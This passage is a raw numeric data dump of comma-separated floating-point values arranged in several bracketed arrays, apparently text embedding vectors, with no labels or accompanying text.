0.024297357,0.016303249,-0.0026853478,-0.020763338,-0.024603773,0.017166914,0.011574709,0.01041015,0.03790957,0.008364215,-0.08061658,-0.043027546,-0.05330262,-0.02657848,0.0843436,0.020570617,-0.039434347,-0.05279608,0.04280371,0.045596115,0.008151837,0.0005195454,0.048066407,0.096060134,0.0037011188,-0.001363467,-0.0025899797,0.01603197,-0.020664956,0.023331517,-0.007251644,-0.057415634,-0.013941335,0.003631792,-0.026596546,-0.020765428,-0.025389329,0.033847593,0.1029218,-0.042829823,0.008810393,-0.00056573754,-0.019848147,-0.015071044,0.016067438,-0.030605394,-0.0075335936,-0.016113413,0.03292472,-0.021958198,-0.016555233,-0.054025177,-0.036033668,0.021782968,0.008266092,0.04464083,-0.009366563,0.0038764642,-0.016976299,0.016232155,0.041854087,0.04773309,0.023316659,-0.009438219,-0.009038286,-0.04257308,0.0036001103,0.006230438,0.035199795,0.057147115,0.047672972,-0.012492723,0.035899043,0.015730873,-0.022165854,0.08594832,-0.012892062,-0.055491675,-0.052258804,-0.0059758383,0.03662099,0.00048033186,-0.0098149525,0.013117004,-0.026508022,-0.01521038,0.03425745,-0.05504775,0.017247459,-0.029860102,-0.044661157,-0.02282366,-0.0016879981,-0.035256293,-0.013876575,0.03591425,0.008528833,0.01343537,0.04042316,0.012214342,0.03417021,-0.04766978,-0.033844396,0.0006411753,-0.008066037,-0.085038476,-0.00202131,0.050622992,0.038681336,-0.00057336,-0.0029267939,0.055745274,-0.0013622019,0.022636738,-0.065664314,0.0017020452,0.039658204,0.0050997776,-0.08008569,0.047038164,-0.047882587,-0.0014175138,-0.01175062,0.0512529,-0.053243507,-0.013190963,0.010681744,-0.049204446,-0.022413168,0.02274906,0.057455633,0.036721915,0.022977421,-0.015156853,-0.025848662,-0.0099856835,-0.033811238,-0.03382958,0.049941443,-0.036348574,-0.03066375,-0.0059205364,-0.039415985,-0.014420911,0.012014381,0.0020303882,-0.015895361,-0.043077722,-0.051236197,0.035347432,-0.0501044,0.0026944124,0.05791821,-0.058216296,-0.018932087,-0.039273214,-0.07868786,-0.023160161,-0.04815193,-0.0013716766,0.004751516,0.010987868,0.006594557,0.0007333406,0.03397252,0.01066025,-0.007370024,-0.017829765,-0.086644486,-0.019800002,-0.026720233,0.025300886,-0.034478445,0.0075772656,-0.005526616,-0.0002758141,0.008601529,-0.013860685,-0.0067509753,0.015883436,0.0055545946,-0.06513985,-0.012693899,-0.005597434,-0.041893125,0.07088213,-0.034131162,-0.048389945,-0.02943664,-0.038355608,-0.045949895,0.0266219,-0.025957746,-0.01121194,-0.029774234,-0.06551972,0.011289922,0.0046644085,0.038565006,-0.029573105,0.0054347753,-0.02846671,-0.06057997,-0.085579515,0.04564599,-0.03886775,0.018111004,-0.0043743504,0.021035267,0.052930202,-0.025237681,0.029739855,0.03597209,0.043987602,0.026821982,0.021435147,0.042409573,0.10016724,0.004346996,0.053460233,0.028515534,0.01859147,0.00040277556,-0.007880063,-0.015950054,0.010625932,-0.04260116,-0.06845667,-0.035184555,-0.01933758,-0.0028716372,0.00926075,-0.019123027,-0.014081046,-0.002635839,-0.0246207,0.00064663857,-0.0431401,-0.02817464,0.041117873,0.028317751,0.026777858,-0.039203957,-0.0075027165,0.029579688,0.038782217,0.022900764,-0.019468337,-0.023904495,-0.03997931,0.009687512,0.031253558,-0.04764629,-0.0140591385,-0.05765735,0.02413435,-0.029760942,0.015354781,-0.010665932,-0.014603425,-0.044407066,0.009504854,-0.036108367,0.0009662015,0.022648979,0.010260529,-0.032153312,-0.08879074,0.044903558,-0.0065794634,-0.0064911465,0.026149027,0.026989687,-0.03555864,-0.0010472259,0.05255237,-0.0224167,-0.009758954,-0.04410717,-0.052662987,-0.014343459,0.0031982663,0.039357133,0.023626793,0.043450188,0.009531939,-0.0011012922,0.004765543,-0.0027183134,0.040414777,-0.013933731,-0.03440315,-0.035874445,-0.0045844354,0.013487818,-0.006380258,-0.029092137,0.028821671,0.009573509,-0.006534494,-0.012677123,-0.038572773,0.033449367,-0.039797116,0.013247159,-0.008831434,-0.039468892,-0.06937486,-0.0021941806,-0.025680933,-0.005112536,-0.055858422,0.008950196,-0.0042747874,-0.025751328,-0.03363937,0.07563085,0.019526849,-0.019312479,-0.008696095,-0.021413483,0.013139613,0.020337071,-0.0061177467,0.0040181796,0.05695082,0.02917466,0.13558629,0.09691212,0.021734266,-0.029512392,0.0374581,0.024012716,-0.05965652,-0.069977544,-0.04024573,0.0034829623],[0.0233172,0.07154605,-0.18283793,-0.05748217,0.042410832,-0.009304074,-0.023259578,0.010107306,-0.0067058234,-0.020296821,0.048673674,-0.025202792,0.09982695,-0.020707717,0.058500305,-0.023454586,-0.050924666,-0.03906226,-0.04489532,0.009878363,-0.017559845,-0.015502331,-0.026036175,-0.018486457,0.055005636,0.045337155,0.0034976853,-0.03488184,-0.060817428,0.01090584,0.02880884,0.009400472,-0.033390775,0.0378385,-0.060980983,-0.0042414023,0.0019641905,0.022691604,0.030189512,0.03275087,0.029132525,0.022209764,0.034289982,-0.046874747,0.032302447,0.003506897,-0.034003172,0.01981539,0.08683289,-0.051875368,0.00835989,0.06808559,0.01792793,0.06585257,0.06451434,0.06560963,0.023591893,0.01437572,0.0061344346,-0.06258323,0.07525233,0.077345,-0.0389979,0.037741948,0.063056335,-0.030787881,-0.0028482776,0.027336141,0.03134743,-0.059617497,0.060507897,0.009626323,0.011119776,0.028043004,-0.045594975,-0.011226794,-0.023563797,-0.031489562,-0.018948847,0.035571966,0.048478924,0.020645624,0.08187594,0.012339233,0.07422271,-0.031064661,-0.034192648,0.001278222,-0.019106232,0.068344355,0.034386545,-0.00026415355,0.016118394,-0.015325325,-0.07324795,0.008996784,-0.016184388,0.022496838,-0.083207674,0.016899427,-0.08844019,-0.018423172,0.010386858,0.023944825,0.064220525,0.05674256,-0.019755293,0.023008117,-0.034005795,0.03975618,-0.051696483,0.04165499,-0.042186216,0.0021962228,0.018118279,-0.023011446,0.06393579,-0.05429072,-0.0017205338,0.048447587,0.011981001,-0.026646404,0.0007623685,0.03660409,-0.021978527,-0.02980361,-0.021583421,0.013825521,-0.019894399,-0.033821277,-0.02983329,-0.057896335,-0.026487952,0.011538225,0.001871913,0.04562516,-0.069877446,-0.019959785,0.014902149,0.010948137,0.006026998,-0.0043138107,-0.022715444,-0.01322049,0.024064105,0.012056614,0.041793857,-0.019556006,-0.047623515,0.0016842452,0.04733921,0.03791436,-0.057053354,0.013706226,0.0072733606,-0.039662857,0.02033734,-0.0141677745,-0.008182268,-0.019611858,0.010045885,0.024208484,-0.03028466,0.02034113,-0.013386083,-0.0789892,0.053299602,0.006891893,-0.006048561,0.03695785,-0.120896325,-0.023696538,0.028198747,0.0037323118,0.03695493,-0.029735178,0.066901125,-0.025076985,0.030270042,0.014265338,0.03258877,-0.057132065,0.015179521,0.019697802,-0.028403746,-0.008346638,-0.019719386,0.0072881947,-0.0049484856,-0.025430553,0.024040254,-0.024315313,-0.04572444,-0.015322329,-0.028934348,-0.010082466,-0.00081300066,-0.026172165,0.03643543,-0.08083545,-0.0351939,0.017264703,-0.075969875,0.0132538825,-0.015849093,0.09640815,-0.009227624,0.032096077,-0.024429344,0.027742798,0.03174313,-0.018709036,0.013238312,0.037133377,-0.007830063,-0.032006025,-0.022515396,-0.01758213,-0.024904154,0.042263992,0.028218996,0.0016244636,-0.009049657,-0.040459238,0.035637204,-0.00925763,-0.06605323,-0.0144467475,-0.0018353293,0.0081545245,-0.02727325,-0.060516514,0.04792304,-0.0060989447,0.0031384747,0.017535204,0.025173103,0.06978523,-0.034536745,0.027570963,0.0010632796,0.023488494,-0.0016661182,0.005925343,-0.046893917,0.008701293,-0.003755294,-0.0003124147,-0.032867525,0.04583189,0.04226935,0.014728028,0.037268635,0.03856339,0.04914413,-0.005717668,-0.04812652,0.011073969,0.01750191,-0.02024561,0.04763329,-0.049719702,0.010156153,-0.07197448,-0.0025839647,0.024186121,-0.04762691,-0.04436439,-0.005142811,-0.0028955652,0.049280666,0.010031946,-0.017635364,0.012048348,-0.009351452,0.03483128,-0.016296979,-0.019119686,-0.052474998,-0.017218912,-0.042797424,-0.034200177,-0.023970407,0.023884438,-0.01626277,0.0017832592,-0.010525935,-0.014276881,0.019912891,0.013862779,0.02000274,0.0020603088,-0.025897369,0.04473652,-0.020599095,0.011793528,0.020092195,0.02310042,0.005057836,-0.08739302,0.05251284,0.02320129,0.08135576,0.04762213,0.012230918,-0.019080924,0.0019474021,-0.024359364,0.0076308735,-0.004577262,-0.028459208,-0.037419394,0.013263221,0.030178692,-0.049822334,0.07097031,0.019045524,-0.017059173,0.061618846,0.005012808,0.014147313,-0.06349178,0.03045034,-0.06766687,-0.023685517,0.0070218714,-0.049429838,0.018256003,0.012970266,-0.029159157,0.00597775,0.007611747,0.043742947,-0.030571995,-0.016360594,0.07803673,0.031151818,-0.045601953,0.013564452,0.021333799,0.0328411,-0.0024888322,-0.026657557,-0.05200229,-0.004056772,0.04759512,-0.026784144,-0.003577495,0.054195635,-0.042648163,-0.011969368,-0.003709832,-0.015271004,-0.013726923,0.0012760689,-0.022337753,-0.0063419165,0.03236159,0.032731637,-0.029643374,0.042201377,0.038250387,0.01004572,0.028007315,-0.023187494,0.020856427,0.0043305773,-0.01505338,0.0029671509,0.01883595,-0.0040915427,-0.046061426,0.0077554756,0.041748434,0.029014064,-0.013567471,-0.10173898,0.021357562,-0.035513483,0.05540961,0.05337985,0.0042068474,0.02022303,0.025434133,0.052122112,-0.02073413,-0.00011326141,-0.055155773,-0.033375375,0.045551933,-0.0030780472,-0.03695016,-0.025050323,-0.010745344,0.028227286,-0.052397948,-0.0031219379,0.06314988,0.01973784,0.038535804,-0.042512078,-0.065230526,0.01682367,-0.007505675,-0.0058146934,0.060677245,-0.006234095,-0.03788531,0.03752742,0.0018247713,0.024776887,0.013763199,-0.023003677,-0.046416383,0.01654011,0.032748047,0.06882462,-0.058183774,-0.037121814,-0.023164494,0.053594258,0.011911348,0.03586868,0.0048117847,0.020703638,0.038847804,0.03073457,0.050528392,-0.011110349,-0.043223206,0.014788689,0.046669323,0.013228923,0.013653542,-0.045743827,0.038966637,0.06794825,0.046085563,-0.029174147,-0.033692453,0.05442784,-0.05835759,-0.035231724,-0.03760856,0.011987826,0.095124096,0.03171682,-0.023307638,-0.08899871,0.028195908,0.013774811,-0.034637365,-0.012741887,0.03491592,0.12620135,-0.016893148,-0.0010690714,0.008477619,0.02279367,0.010598731,0.012478773,-0.0068340483,-0.05618007,0.0238469,0.05626879,-0.04463987,-0.03778914,-0.06684085,0.025979383,0.026690206,-0.030869124,0.002962191,-0.0106539605,-0.033412956,0.0008022819,0.0017894908,-0.026246423,-0.012248446,-0.0040176697,0.030415967,0.025156628,-0.0020577,-0.044493515,-0.062270466,0.0063673873,0.031968776,0.008425813,-0.024011347,-0.029625572,-0.013278151,0.018668866,0.002749388,0.053925097,0.035599533,-0.047044285,-0.016208623,-0.018211816,0.0019154004,0.03436464,-0.029249117,0.058035694,0.075835556,-0.030379359,0.0043102456,0.022302575,-0.00013690843,0.072822325,-0.048876032,-0.03103328,-0.012781411,-0.0014742352,-0.019529268,0.0024916313,0.04423076,0.035865273,-0.03048222,0.033193137,0.0028271927,-0.061035484,-0.0030872116,0.016308574,-0.048852872,0.00020406039,-0.003338047,-0.05002304,-0.0051248963,0.016294872,-0.025244672,0.058027163,0.0021839056,0.024192803,0.038833834,-0.05481101,-0.02510762,0.003132765,-0.020726433,-0.05032145,0.033197645,0.06952878,0.024063222,0.0071087773,0.029423965,0.034355465,-0.020644004,0.033445563,-0.0039464645,-0.020705316,0.019245261,0.025178155,-0.055663075,0.041351784,-0.066302024,0.02555868,-0.017396348,0.011344816,-0.06857214,0.0050118566,-0.026321257,-0.055391535,-0.014217838,0.011231131,0.034467146,0.053902652,0.028024605,0.027237305,-0.016069802,0.010936731,-0.021344488,0.012613669,-0.012118041,0.0044423034,-0.03276487,0.007821687,-0.017107517,0.00941616,0.015527668,0.020330233,0.0034986446,-0.044375844,-0.063583694,0.048526507,-0.04274849,0.005057824,0.02175851,-0.0074145542,-0.03205446,-0.07670935,-0.0026033174,0.017283088,-0.029561058,0.0027797592,0.020264652,0.00682067,-0.014973997,-0.026680358,0.040111985,-0.00789986,-0.015422029,-0.037099507,-0.06977855,-0.036195885,0.009588585,0.073068075,-0.061563794,0.025313992,0.025889121,-0.015489731,0.0151017625,0.01143098,-0.03126965,0.03897464,0.02764197,-0.0030987987,-0.02921941,0.026510656,-0.039223734,0.04910223,-0.0098751355,-0.0134425815,-0.03632068,-0.0333368,-0.05893773,0.009566992,-0.049258515,0.03634553,-0.014895098,-0.05142708,-0.046040125,-0.014865479,0.032538805,-0.020919917,0.01382847,-0.03973956,-0.038803745,-0.034202415,-0.00046432007,-0.042766374,-0.006780905,0.013166943,0.021288386,0.06526312,-0.01897942,0.0020946735,0.032925114,0.07546396,-0.047443733,0.0070338994,0.03956436,0.030751476,-0.022712076,0.046366967,0.06561315,0.0076881195,-0.021015095,-0.011758376,-0.010763143,0.015746586,-0.045248143,-0.04607714,-0.036988117,-0.0055692187,0.009112542,-0.0020160736,0.0098229125,-0.027657367,-0.0057881945,0.020866089,0.012988371,-0.06227087,-0.011906335,0.019792436,0.027376408,-0.016348906,-0.029409934,-0.010635268,0.021485224,0.037072107,0.0012693924,-0.017908283,-0.011819945,-0.007770446,0.030823626,0.040715724,-0.023070484,-0.034852743,-0.027290856,0.00054953166,-0.013168936,0.011394586,-0.040479004,-0.047161575,-0.06695194,-0.040046677,-0.05931859,0.0045547322,0.017016005,-0.03126852,-0.006871854,-0.030442756,0.08417859,0.023928933,-0.00051717076,0.011321497,0.0322895,0.0155100925,0.023906179,0.027867265,-0.0005304355,0.024600662,-0.03556017,-0.045406673,0.00531115,-0.02571987,0.023693385,0.04262568,0.011440629,-0.0034128686,-0.03497118,-0.021564584,0.03881984,0.0036615604,-0.003105373,-0.044855826,-0.045960583,-0.007191264,0.020584324,0.043946806,-0.04735395,0.023522103,0.0032949513,-0.0006648801,-0.0047518355,-0.04298848,0.052091215,-0.009476117,-0.007706727,0.01120931,-0.020646535,-0.017717222,-0.021524083,-0.042875413,-0.012174537,-0.0031042811,0.023183325,0.019592943,-0.03110345,-0.018128488,0.046079464,0.0004148961,-0.02155742,0.039601732,-0.0013851263,0.015425664,0.009477436,0.02691912,-0.016232366,-0.0030038583,0.06324324,0.097708344,0.08262985,0.03079808,-0.009758156,0.043451946,0.024175037,-0.040637128,-0.036761604,-0.04830508,0.044444926],[0.0022103535,0.02261479,-0.14457093,-0.11212973,0.055943873,-0.079893924,0.024823423,0.028131185,-0.030382048,-0.05442841,-0.006397307,0.032250714,0.043170102,0.03627172,0.039266255,-0.01097961,0.01264745,-0.05553878,-0.020226521,0.060637444,-0.017848102,0.034646798,-0.00489453,-0.06494732,0.054455355,0.011000855,-0.0044346,-0.024086226,-0.060083143,-0.00447028,0.030424925,-0.044394247,0.0031806785,-0.0023531737,-0.0741914,-0.028592568,0.010603814,-0.010795953,-0.019214226,0.0083438,0.03055718,0.027129814,0.010048996,-0.025032565,0.005286489,-0.06029982,0.07973758,0.0115843015,0.042725243,-0.04950738,-0.008169072,-0.015595867,0.031191915,-0.018121433,0.06749095,0.070957966,-0.033726,0.038257465,-0.0058832443,-0.012597546,0.11882988,0.04991235,-0.08712641,0.046011038,0.0031520627,-0.026158918,-0.052317448,0.040951945,0.015932439,-0.016688991,0.028105792,-0.01871184,-0.034964226,0.05613578,-0.075490944,-0.03219436,-0.015844522,-0.012420427,0.023623638,0.08426997,0.02777929,-0.044982325,0.0898562,-0.0095682815,0.012831247,-0.03919062,-0.03071853,0.013916384,-0.023823895,0.07548732,0.013303949,-0.029629173,-0.0024031447,0.01849542,-0.07298426,-0.009967254,0.013895942,0.016439557,0.025244802,-0.009528565,-0.053672187,-0.011913606,-0.011618293,-0.0023361738,0.012795041,0.05765809,0.026516376,0.013881284,-0.0521056,0.0056712376,-0.041725524,0.1061003,0.0058917953,0.002472159,-0.029448982,-0.046250768,0.025570044,-0.023552936,-0.019951683,-0.007842331,-0.026337609,-0.046828635,-0.0019906831,0.041743536,-0.017279632,-0.015079081,-0.053506896,0.0091888495,0.016906925,-0.05396697,-0.03587944,-0.016124506,-0.006209765,0.014939513,0.033881456,0.026351482,-0.026292438,-0.006620508,0.019854313,-0.017481145,-0.004380912,0.046262138,-0.05319949,-0.035396155,0.020786947,-0.06471414,-0.025984183,-0.06215249,-0.03210606,0.017998444,0.016549585,-0.01004635,-0.02371607,0.014341802,0.046158534,-0.002471762,-0.0006016643,-0.018168002,0.006371097,0.018414697,0.04707535,0.005488365,-0.030892298,0.044915948,0.04490159,-0.050165813,0.008633286,0.030602768,-0.011847029,0.011037159,-0.08007991,-0.022518717,-0.014927128,-0.012923511,0.016783778,0.034206286,0.056275155,-0.015473531,-0.0059365532,-0.03176873,0.04357353,-0.059158843,0.036842164,0.046854295,-0.025068305,0.005153118,0.0084340535,-0.027987717,0.022825018,-0.022722946,0.004116488,-0.012602971,-0.024711924,-0.017351547,-0.05210184,-0.064382486,0.020618612,-0.030196955,0.03226094,-0.027301665,-0.09420832,-0.033710416,-0.03689346,0.017619232,-0.02897836,0.046245396,-0.0059875785,-0.013726237,-0.03894283,0.04561977,0.063927315,0.020716818,-0.013785838,0.016197272,0.0055434736,0.032011617,-0.010836995,-0.005309532,-0.03785925,0.015330814,-0.005335945,0.01656473,0.015325318,0.018049382,0.039388742,-0.00015582093,-0.021205269,0.008127713,-0.022892537,-0.032164775,0.021095913,-0.08678835,0.037945762,-0.013195951,0.01425831,0.019498372,-0.0031193115,0.042587675,-0.011528697,0.033633295,0.032397445,0.019825127,0.0031131965,0.003966718,-0.039847653,-0.0305655,0.034932546,-0.025017321,-0.022403754,0.061252903,-0.019278362,0.00952988,0.02664131,-0.020960325,0.042599954,0.013854385,-0.019628257,0.011287037,0.03384451,0.029859683,0.034507,-0.035956353,0.0036868874,-0.023278268,-0.02972762,-0.041044403,-0.013036653,0.020261554,0.029255334,-0.0039462396,0.008644543,0.054338638,-0.0033930836,-0.023043323,-0.025406031,0.036248945,-0.02862122,-0.0014744782,-0.011985792,0.04674728,-0.011862117,0.008165577,0.015735384,0.02184165,0.020320078,0.009711627,-0.026434528,0.004126388,0.027657136,0.0053143413,0.01056924,-0.003039829,-0.05384101,0.04438941,0.0033052508,0.021792687,0.036055315,0.024771156,-0.023234688,-0.044045806,0.022934189,0.056381423,0.052092362,0.033015016,0.008077468,-0.002049952,-0.030139249,-0.046413187,0.035085008,-0.06385339,-0.05039621,-0.001749281,-0.02852221,0.029650297,-0.046207417,0.017601635,0.030317597,0.012751285,0.02212044,0.009329885,0.013732043,-0.06489749,0.03740484,-0.019013222,-0.029785236,0.09709316,-0.0138640795,-0.012217457,-0.010299022,0.00042240892,0.03209943,0.01992215,0.047817443,-0.012987291,-0.01525818,0.019001577,0.032365218,-0.018665843,-0.040742733,0.036609825,0.043510497,0.021573758,0.061867066,-0.0077124923,0.002842796,-0.01656842,-0.037601724,-0.02384904,0.037130885,0.032433502,-0.030123388,-0.010905401,-0.045667395,-0.012745929,0.024659704,0.022402268,0.0530407,0.061778307,0.0011160552,-0.0066250316,0.07213285,0.001671982,0.04713326,-0.010619779,-0.020999487,0.023410102,0.032842096,-0.015681688,0.0018620889,-0.008110959,-0.003903705,-0.068303846,-0.017894808,0.018126613,-0.009991423,0.00002053968,-0.04140212,0.015639266,0.010266174,0.037541512,-0.008655372,-0.0022134138,-0.0050369264,0.039749034,0.011383038,-0.02737913,0.027857402,-0.004804875,-0.002674779,0.05660814,-0.016450958,-0.039706193,0.0065701525,0.019388542,0.018977273,-0.04514108,0.044701993,0.053334508,-0.018340047,0.082863376,-0.047454458,-0.073942766,0.020101797,0.037947387,-0.004876617,0.0129904635,-0.07232896,-0.052624937,0.076431364,0.012694179,0.036160257,0.017165864,0.0047374903,0.008855778,0.012626632,-0.020756429,0.05694178,0.0043036975,-0.027749155,-0.0012215783,0.023461564,0.041676067,0.022683812,-0.0019115065,0.027241552,-0.028972935,0.010627811,0.033009097,0.033417013,-0.030209942,0.042739496,0.030444331,0.05374397,-0.032280944,-0.029784366,0.0009993477,-0.000048740887,0.02887617,-0.0022527005,-0.0011495048,0.017230615,-0.019027049,-0.04696096,-0.0074770683,0.024525372,0.06276328,0.034982182,-0.039218016,-0.023235401,0.02922765,-0.017539619,0.011176255,0.01671686,-0.0026211448,0.12127002,-0.00092759257,0.017503437,-0.0075096274,0.031075567,0.03028972,0.035098683,0.046004973,-0.03356172,0.025961585,0.011318755,-0.035188507,-0.0039314744,-0.043578003,0.044538945,0.091175936,-0.0836465,-0.01979402,0.022961687,-0.073506095,0.0044301553,0.06105868,-0.022406545,-0.002066945,0.008368136,0.05705725,0.02548955,-0.078817554,-0.030307554,-0.039910465,-0.06695072,0.056865178,0.035450056,-0.020521212,-0.015114317,-0.015746508,0.01888207,-0.009497321,-0.010059941,-0.010310041,-0.053587135,-0.020984234,-0.019352462,0.04616761,0.058998857,-0.0056774607,0.027699398,0.050029125,0.036822755,-0.0034617886,0.009063821,-0.060803637,0.08646446,-0.06014979,-0.07244991,-0.017648105,-0.008041548,0.04215493,-0.026469402,0.014684714,0.02903036,-0.026679277,0.051922612,0.03875088,-0.056678575,0.008936638,0.012799142,-0.045963597,-0.033837005,0.013924708,-0.032731567,-0.0010295291,-0.015235005,-0.08244397,0.007114115,-0.025017658,-0.010522255,-0.009112096,-0.010933155,-0.01258629,0.05660042,-0.030899392,-0.03891434,0.009014155,0.030792411,0.041105125,0.033840097,0.014411652,0.009349025,-0.037814453,-0.01413101,-0.051494747,0.033930894,0.056117702,-0.029794494,-0.05764823,-0.0023319118,-0.027074186,0.028260963,-0.037773214,-0.0003879565,-0.031259533,0.019912113,-0.043579314,-0.031835284,-0.027600601,-0.05579497,-0.020614905,0.054610614,0.06975186,-0.00990167,-0.028775454,-0.042931285,-0.022692384,-0.015325836,0.05302867,0.00272061,-0.042302806,0.010176471,0.006777581,-0.0149749415,-0.020926133,0.03835093,-0.0011496753,-0.0071146404,-0.033443116,0.027590942,-0.06460219,0.01676137,0.03598325,-0.08036598,-0.006090086,-0.015710719,-0.050240517,-0.026645238,-0.00023294793,-0.018124761,0.02765592,0.041448183,-0.011834052,0.016336797,0.0021251237,-0.0046485346,-0.0049744193,-0.026476748,-0.04837376,0.038202383,0.019620474,0.059408117,-0.030183533,0.0035432207,0.0759499,-0.050285347,0.0164567,-0.009103868,-0.013267396,0.016476933,0.011127241,0.0033515822,-0.011120511,0.043086525,-0.043202173,0.01832677,0.025729049,0.0075875157,-0.013715292,0.01232707,-0.030329963,0.041149262,-0.061147068,0.0026650347,0.011560228,0.0003353359,-0.038690116,-0.009472927,0.0013682215,-0.03195501,0.0018184579,-0.047582507,-0.029547429,-0.10900397,0.07022889,0.005918227,0.03976907,-0.01140125,0.05693617,0.0144531755,-0.010825412,-0.027898788,0.05264693,0.03303618,-0.032304745,-0.0008096671,0.07270966,0.028790057,0.002573595,0.10526907,0.067901,0.043320432,0.006402139,-0.006986948,-0.013537697,0.018226538,-0.03142254,-0.07703112,-0.02252455,-0.0067927716,-0.020913273,-0.03494412,0.030720389,0.0041064364,-0.021238884,-0.035655938,0.00030738732,-0.006314617,-0.030779703,0.046487406,0.0056105023,0.013054043,-0.06456136,0.030400032,0.025469076,-0.0027929824,0.001545003,-0.04499048,-0.0012965705,-0.0007648766,0.006161506,0.028759448,-0.02834497,-0.0039965273,-0.035090625,0.03556838,-0.0120665645,-0.032429665,-0.013836663,-0.08407398,-0.021523403,-0.024821565,-0.006004557,0.02000426,0.02844712,0.044184845,-0.047781184,0.0020476864,0.0950343,-0.008200563,0.023651151,0.013347483,0.012991207,0.015830617,0.0077186124,-0.0015281512,-0.02679653,-0.015759967,-0.08351843,0.005159582,0.022398714,-0.017092839,0.05076791,0.037921485,-0.0016366334,0.008929173,-0.01657109,-0.011988534,0.052823808,-0.0065982686,-0.014808777,-0.03721712,0.014569349,-0.005156375,0.007800288,0.058662098,-0.021830698,0.007444978,-0.025561033,0.0138116805,-0.03196703,-0.018622208,0.09215069,0.048605323,0.04558065,-0.008833897,-0.021029117,-0.08142495,-0.041262373,-0.036575083,0.025971979,-0.020600824,-0.022541218,-0.010601178,-0.015594912,-0.014564999,0.03461156,0.01251734,-0.019906683,0.027799778,-0.013513784,0.018892856,-0.02303456,-0.034910508,0.01254145,-0.030764075,0.04415346,0.12902969,0.029992158,-0.0062638307,0.014781031,0.015998825,-0.035736803,-0.019602627,-0.032755047,-0.03523963,-0.036918264],[-0.024598256,0.03620258,-0.20740296,-0.0010478493,0.08802643,-0.027339252,0.051082782,0.025635757,-0.02897275,-0.008105176,0.018755317,0.052163392,0.09659641,0.0005859262,0.012848459,-0.012222146,0.008704455,-0.09544188,0.0080454685,0.042517863,-0.0047233105,-0.041919693,0.0067058005,-0.0611238,0.01147786,0.036523417,-0.03549063,-0.04371189,-0.019863266,0.016290212,0.05265131,-0.081507415,0.00826051,0.0074397377,-0.080805235,0.019717881,0.043217372,-0.011830989,0.045573227,-0.041725844,0.05995121,0.008115393,0.03253157,0.018871676,0.0042706127,0.0017882688,0.03726743,-0.012723871,0.0025948514,-0.02165264,0.027980132,0.03177223,0.024901835,0.056017186,0.061278876,0.031388752,-0.01801328,0.03484791,0.015328087,-0.08835009,0.045441948,0.015169977,-0.06036299,0.02798001,0.017759923,-0.00066248496,0.0019521771,0.029589426,0.009567297,-0.06716608,-0.0074724467,-0.010113011,-0.019729167,0.008705185,-0.04803631,-0.028576028,0.00093372125,-0.041835953,-0.045580775,0.037891537,0.025836121,0.0010648965,0.050402746,0.0050123823,0.05607199,-0.013970103,-0.017151166,0.023625046,-0.043617126,0.094686456,0.008835633,0.02586534,0.012331217,0.0396054,-0.06435713,0.015380216,0.005695425,-0.013875694,-0.038753886,0.0047600376,0.0076268143,0.0031586739,0.016747447,0.007347138,0.00094413676,0.068814926,-0.001204866,0.013141938,-0.03690434,0.012737698,-0.06335697,0.041748922,0.0041822325,-0.03584899,-0.035060376,-0.025640974,-0.0027466102,-0.007902363,-0.04561203,0.027717145,0.012763966,-0.011186678,-0.016073238,0.04002619,0.0013761352,0.023256177,-0.067254536,0.0012722907,-0.041780118,-0.03501729,-0.0010124105,-0.05492046,-0.055144306,-0.017813895,0.036013406,0.0960208,-0.029416304,0.012037269,0.02678788,0.031142807,-0.007497259,0.02947678,0.00971847,-0.01115615,-0.03595525,-0.033169825,0.04736939,-0.0006937902,-0.056266457,0.059370417,0.00058865396,0.022089293,0.0015390168,0.027916372,-0.013521144,-0.021878574,-0.0006748898,-0.0021106303,-0.008966412,-0.004652203,0.029724983,-0.014604525,-0.015830947,0.014065923,-0.0033652568,-0.06697095,-0.0039570704,0.013538924,0.020032687,0.04432138,-0.06339656,-0.050472036,0.0072045466,-0.027126342,0.0057548787,-0.0027573672,0.08948515,-0.04434506,-0.02081107,-0.015599431,0.051473945,-0.03770822,0.010134225,0.030719155,-0.0038126681,-0.025280803,0.007904038,0.0011658627,-0.042981505,-0.01221494,0.03915819,-0.01749779,-0.021576803,-0.013190647,-0.032401424,-0.03326971,0.078560345,-0.048897166,0.021267142,-0.03440542,-0.02322338,-0.020908259,-0.021151759,-0.0005603934,-0.04914542,0.04812478,0.030710494,0.024363376,-0.037811805,0.009026284,0.001408536,0.010231768,0.027399905,0.020607866,0.034979172,-0.021021744,-0.0017110036,-0.023369359,-0.023524664,0.037250083,-0.016622793,0.021363607,-0.023953648,0.026722467,0.030582963,-0.036854494,-0.008147592,0.011974884,0.0026581353,0.041719705,-0.0028138685,-0.063931294,0.048529644,-0.017914493,-0.01717436,0.016469585,0.007455948,0.050108753,0.010051436,0.06400118,0.0076945797,0.042212315,-0.038077883,-0.013546444,-0.051849745,-0.0147753125,-0.020711713,0.0051427707,0.0051389844,0.02404322,0.013841731,0.039636254,0.05174032,0.0025682992,0.02444303,-0.043979857,-0.043938737,0.01047896,0.0041198814,0.042029057,0.0026180218,-0.00016685961,0.040530406,-0.0070454213,-0.019604605,-0.010468563,-0.024536945,-0.051451936,-0.033934243,-0.021436445,0.012727645,-0.0076744836,-0.014248847,0.059999324,-0.013086592,0.048897542,0.019935796,-0.030448047,-0.011971834,-0.016176758,-0.026015485,-0.09341524,-0.029592227,0.01039325,0.008055957,0.013841139,0.019129336,-0.021613622,0.01578662,0.010002997,-0.008347137,-0.015100293,0.012118394,0.02554758,0.0069805314,0.0067022173,0.06546987,-0.027103333,0.036617618,-0.04246058,0.03214158,0.037262417,0.041584894,0.040944196,-0.02577491,0.002322226,0.0005877297,0.002357681,0.011514011,-0.0037764262,-0.022723168,-0.0141147,-0.08263185,0.033000875,-0.01506276,-0.028409965,0.055064354,0.02965061,0.030057346,-0.010593171,0.06818475,-0.0373911,-0.032790665,-0.048302718,0.0040486413,0.030989606,-0.014756746,0.015121219,-0.032350358,-0.021353465,0.091839425,0.03605832,0.043963283,-0.0622458,-0.025665155,0.023648744,0.009165114,0.014170837,-0.012497378,0.030510025,0.016674804,0.0022120622,0.0061219744,-0.033723857,-0.0017227964,0.0027040383,-0.026563609,-0.020726986,0.020034263,0.040453296,0.01382222,0.020680185,-0.026291061,0.0064870026,0.032283317,0.004949062,0.027247457,0.033284258,0.018228687,-0.037841205,0.048333704,0.052217416,0.024865681,-0.04882692,-0.00800245,0.014407869,0.048525304,0.015199948,0.016801147,0.033479843,-0.006717708,0.0027126898,0.016048696,0.006085362,-0.019282676,0.0077634486,-0.042978644,0.048000835,0.009033703,0.03338362,0.040663235,-0.004696881,-0.047940172,0.027518779,-0.005572386,0.0027264957,0.006541222,-0.029674733,0.0032735737